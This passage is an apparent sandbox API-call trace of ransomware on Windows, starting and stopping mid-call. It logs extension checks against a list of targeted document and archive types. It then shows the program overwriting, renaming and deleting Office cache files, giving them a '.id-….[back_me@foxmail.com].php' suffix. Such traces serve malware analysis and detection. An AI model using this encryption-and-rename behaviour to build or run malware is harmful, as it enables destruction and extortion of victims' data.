(lpString=".dbf") returned 4 [0048.645] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0048.645] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0048.645] lstrlenW (lpString=".1cd") returned 4 [0048.645] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0048.645] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0048.645] lstrlenW (lpString=".jpg") returned 4 [0048.645] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0048.645] lstrcmpiW (lpString1=".cab", lpString2=".php") returned -1 [0048.645] lstrlenW (lpString="ProPrWW.cab") returned 11 [0048.645] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0048.650] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=177720283) returned 1 [0048.650] CloseHandle (hObject=0x21c) returned 1 [0048.650] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab")) returned 0x2020 [0048.650] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.650] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0048.651] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0048.651] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0x0) returned 1 [0048.651] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.651] ReadFile (in: hFile=0x21c, lpBuffer=0x3fb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3fb0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.657] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x387ee9e, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.657] ReadFile (in: hFile=0x21c, lpBuffer=0x3ff0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ff0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.663] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0048.663] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xa93cbdb, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.663] ReadFile (in: hFile=0x21c, lpBuffer=0x4030058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x4030058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.680] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.680] WriteFile (in: hFile=0x21c, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x366fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0048.940] SetEndOfFile (hFile=0x21c) returned 1 [0048.940] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x42bc928 [0048.943] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.944] WriteFile (in: hFile=0x21c, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.944] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x387ee9e, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.944] WriteFile (in: hFile=0x21c, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.945] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xa93cbdb, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.945] WriteFile (in: hFile=0x21c, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.947] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x42bc928 | out: hHeap=0xb10000) returned 1 [0048.947] CloseHandle (hObject=0x21c) returned 1 [0048.947] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0048.948] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0048.948] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0048.948] lstrlenW (lpString=".doc") returned 4 [0048.948] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0048.948] lstrlenW (lpString=".docx") returned 5 [0048.948] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0048.948] lstrlenW (lpString=".pdf") returned 4 [0048.948] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0048.948] lstrlenW (lpString=".xls") returned 4 [0048.948] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0048.948] lstrlenW (lpString=".xlsx") returned 5 [0048.948] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0048.948] lstrlenW (lpString=".ppt") returned 4 [0048.948] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0048.948] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0048.948] lstrlenW (lpString=".zip") returned 4 [0048.948] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0048.948] lstrlenW (lpString=".rar") returned 4 [0048.948] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0048.948] lstrlenW (lpString=".bz2") returned 4 [0048.948] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0048.948] lstrlenW (lpString=".7z") returned 3 [0048.948] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0048.948] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0048.948] lstrlenW (lpString=".dbf") returned 4 [0048.948] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0048.949] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0048.949] lstrlenW (lpString=".1cd") returned 4 [0048.949] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0048.949] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0048.949] lstrlenW (lpString=".jpg") returned 4 [0048.949] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0048.949] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0048.949] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0048.949] lstrlenW (lpString=".doc") returned 4 [0048.949] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0048.949] lstrlenW (lpString=".docx") returned 5 [0048.949] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0048.949] lstrlenW (lpString=".pdf") returned 4 [0048.949] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0048.949] lstrlenW (lpString=".xls") returned 4 [0048.949] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0048.949] lstrlenW (lpString=".xlsx") returned 5 [0048.949] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0048.949] lstrlenW (lpString=".ppt") returned 4 [0048.949] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0048.949] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0048.949] lstrlenW (lpString=".zip") returned 4 [0048.949] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0048.949] lstrlenW (lpString=".rar") returned 4 [0048.949] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0048.949] lstrlenW (lpString=".bz2") returned 4 [0048.949] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0048.949] lstrlenW (lpString=".7z") returned 3 [0048.949] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0048.949] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0048.949] lstrlenW (lpString=".dbf") returned 4 [0048.949] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0048.949] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0048.949] lstrlenW (lpString=".1cd") returned 4 [0048.950] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0048.950] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0048.950] lstrlenW (lpString=".jpg") returned 4 [0048.950] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0048.950] lstrcmpiW (lpString1=".exe", lpString2=".php") returned -1 [0048.950] lstrlenW (lpString="ose.exe") returned 7 [0048.950] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0049.781] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=174440) returned 1 [0049.781] CloseHandle (hObject=0x1c0) returned 1 [0049.781] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 0x2020 [0049.782] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0049.782] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0049.782] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.782] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.782] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0049.782] GetLastError () returned 0x0 [0049.782] ReadFile (in: hFile=0x1c0, lpBuffer=0x3fb0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x366fed4, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesRead=0x366fed4*=0x2a968, lpOverlapped=0x0) returned 1 [0049.787] WriteFile (in: hFile=0x198, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0x2a970, lpNumberOfBytesWritten=0x366fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fc9c*=0x2a970, lpOverlapped=0x0) returned 1 [0049.790] ReadFile (in: hFile=0x1c0, lpBuffer=0x3fb0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x366fed4, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesRead=0x366fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.790] WriteFile (in: hFile=0x198, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x366fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fc9c*=0xe2, lpOverlapped=0x0) returned 1 [0049.790] SetEndOfFile (hFile=0x198) returned 1 [0049.791] CloseHandle (hObject=0x198) returned 1 [0049.791] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.791] SetEndOfFile (hFile=0x1c0) returned 1 [0049.793] CloseHandle (hObject=0x1c0) returned 1 [0049.793] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0049.793] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 1 [0049.794] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0049.794] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0049.794] lstrlenW (lpString=".doc") returned 4 [0049.794] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0049.794] lstrlenW (lpString=".docx") returned 5 [0049.794] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0049.794] lstrlenW (lpString=".pdf") returned 4 [0049.794] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0049.794] lstrlenW (lpString=".xls") returned 4 [0049.794] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0049.794] lstrlenW (lpString=".xlsx") returned 5 [0049.794] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0049.794] lstrlenW (lpString=".ppt") returned 4 [0049.794] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0049.794] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0049.794] lstrlenW (lpString=".zip") returned 4 [0049.794] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0049.794] lstrlenW (lpString=".rar") returned 4 [0049.794] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0049.794] lstrlenW (lpString=".bz2") returned 4 [0049.794] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0049.794] lstrlenW (lpString=".7z") returned 3 [0049.794] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0049.794] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0049.794] lstrlenW (lpString=".dbf") returned 4 [0049.794] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0049.794] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0049.794] lstrlenW (lpString=".1cd") returned 4 [0049.794] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0049.794] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0049.794] lstrlenW (lpString=".jpg") returned 4 [0049.794] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0049.795] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0049.795] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0049.795] lstrlenW (lpString=".doc") returned 4 [0049.795] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0049.795] lstrlenW (lpString=".docx") returned 5 [0049.795] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0049.795] lstrlenW (lpString=".pdf") returned 4 [0049.795] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0049.795] lstrlenW (lpString=".xls") returned 4 [0049.795] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0049.795] lstrlenW (lpString=".xlsx") returned 5 [0049.795] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0049.795] lstrlenW (lpString=".ppt") returned 4 [0049.795] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0049.795] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0049.795] lstrlenW (lpString=".zip") returned 4 [0049.795] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0049.795] lstrlenW (lpString=".rar") returned 4 [0049.795] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0049.795] lstrlenW (lpString=".bz2") returned 4 [0049.795] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0049.795] lstrlenW (lpString=".7z") returned 3 [0049.795] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0049.795] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0049.795] lstrlenW (lpString=".dbf") returned 4 [0049.795] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0049.795] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0049.795] lstrlenW (lpString=".1cd") returned 4 [0049.795] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0049.795] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0049.795] lstrlenW (lpString=".jpg") returned 4 [0049.795] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0049.796] lstrcmpiW (lpString1=".dll", lpString2=".php") returned -1 [0049.796] lstrlenW (lpString="PidGenX.dll") returned 11 [0049.796] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0049.796] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=1463568) returned 1 [0049.796] CloseHandle (hObject=0x1c0) returned 1 [0049.796] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 0x2020 [0049.796] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0049.796] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0049.796] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.796] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.796] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0049.799] GetLastError () returned 0x0 [0049.799] ReadFile (in: hFile=0x1c0, lpBuffer=0x3fb0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x366fed4, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesRead=0x366fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0049.824] WriteFile (in: hFile=0x198, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x366fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0050.583] ReadFile (in: hFile=0x1c0, lpBuffer=0x3fb0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x366fed4, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesRead=0x366fed4*=0x65520, lpOverlapped=0x0) returned 1 [0050.598] WriteFile (in: hFile=0x198, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0x65530, lpNumberOfBytesWritten=0x366fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fc9c*=0x65530, lpOverlapped=0x0) returned 1 [0050.830] ReadFile (in: hFile=0x1c0, lpBuffer=0x3fb0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x366fed4, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesRead=0x366fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.831] WriteFile (in: hFile=0x198, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x366fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fc9c*=0xea, lpOverlapped=0x0) returned 1 [0050.831] SetEndOfFile (hFile=0x198) returned 1 [0051.060] CloseHandle (hObject=0x198) returned 1 [0051.060] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.060] SetEndOfFile (hFile=0x1c0) returned 1 [0051.064] CloseHandle (hObject=0x1c0) returned 1 [0051.064] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0051.064] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 1 [0051.065] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0051.065] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0051.065] lstrlenW (lpString=".doc") returned 4 [0051.065] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0051.065] lstrlenW (lpString=".docx") returned 5 [0051.065] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0051.065] lstrlenW (lpString=".pdf") returned 4 [0051.065] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0051.065] lstrlenW (lpString=".xls") returned 4 [0051.065] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0051.065] lstrlenW (lpString=".xlsx") returned 5 [0051.065] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0051.065] lstrlenW (lpString=".ppt") returned 4 [0051.065] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0051.065] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0051.065] lstrlenW (lpString=".zip") returned 4 [0051.065] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0051.065] lstrlenW (lpString=".rar") returned 4 [0051.065] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0051.065] lstrlenW (lpString=".bz2") returned 4 [0051.065] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0051.065] lstrlenW (lpString=".7z") returned 3 [0051.065] lstrcmpiW 